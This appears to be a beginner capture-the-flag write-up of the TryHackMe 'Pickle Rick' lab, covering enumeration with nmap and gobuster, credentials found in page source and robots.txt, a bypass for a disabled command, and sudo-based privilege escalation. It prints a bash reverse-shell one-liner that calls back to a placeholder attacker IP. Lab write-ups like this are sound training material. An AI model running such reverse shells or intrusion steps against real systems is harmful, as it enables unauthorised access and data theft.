Pickle Rick
A beginner level easy Capture The Flag(CTF) that challenges beginners to solve variety of tasks using available tools and hacking into a server to steal data. In this post, a course task from HackerU : RED Team Pentester, I will show the steps followed to get the flag.
Basic Checks to be performed before attacking the machine.
1.Power on the Target Machine and make a note of the IP address.
2.Start your Kali Virtual Machine.
3.Connect to TRY HACK ME OPEN VPN
4.Check connectivity to the target machine from attacker pc (Kali VM).
Step 1
NMAP (NETWORK MAP) -Enumeration
Now, we will perform standard nmap screen , discover open ports , operating system and other information to enumerate further.
- v stands for verbose
- -Pn skip host discovery and treat all hosts are up
- The reason flag is used to understand the reason why the port is open , closed or filtered and why the host is marked alive.
After the scan result , discovered open ports
- Port 80
- Port 22
Also discovered that the host is running on Linux.
Step 2
Directory Search Using GoBuster
We are going to be using gobuster to try and locate any directories that may have been hidden from us.
Command Breakdown:
-u: Full URL (including scheme), or base domain name.-w: Path to the wordlist used for brute forcing (use – for stdin).-x: List of extensions to check for, if any.
It looks like GoBuster was able to find a eight (8) directories for us including robots.txt.
Let’s check out the login.php as we found from nmap scan that it is a web service running on port 80.
Though, port 22 is open we need the credential and let us not mess with it.
Step 3
WebPage
We have a web page and lets us look at the page source code if something interesting is avaialble.
We found the username but we do not have the password yet. In most cases websites will have robots.txt which will tell search engine crawlers which pages or files the crawlers can or can not request from the site.
Let us check if it is password to login. We will be able to login and the portal directs to a command prompt as shown.
Now we know who we are and what is the IP of the box. Let us execute basic commands and check what is avaialble in the box.
type #which python:it does not return any thing.
type #which python2:it does not return any thing.
type #which python3:Available
type #which perl:Available
type #which bash:Available
We can use perl or python to get a reverse shell and then elevate root access to capture the flag.
The first flag to capture is
What is the first ingredient Rick needs?
Let us first understand in which directory we are in.In the command prompt type # pwd and we can see the current directory we are in.
Let us see if the command “ls -la” returns any data. We can find the command returns and we can see the first flag.
When you try cat <File Name>.txt , throws an error “Command Disabled” . we need to read the contents of the text file.
We captured the first flag. You can alternatively try “less <something.txt>” and we get the flag for the first question.
Whats the second ingredient Rick needs?
We need root access to capture the second flag. From earlier commands execution, we know that python3/perl/bash can be used for reverse shell access.
Let us google for revershell codes which can be executed in the command prompt and use netcat in attacker machine to gain access.
bash -c "bash -i >& /dev/tcp/<Attacker Machine IP>/<Port> 0>&1"
Navigate to the home folder and you can find two users “Rick” and “Ununtu”.
You can find the answer for the second flag. Alternatively without revershell you can get the flag using the command line option
You can read more about the “less command”
We got both the flags and we need to find the last flag. In the terminal when you type “sudo -l” you get it all — priv ecalation to get the 3rd flag and you have it all in front of you.
and that’s it you are root and you have the third file that contains the last flag for the machine .It is a very nice challenge , little bit of twists, and get used to it :).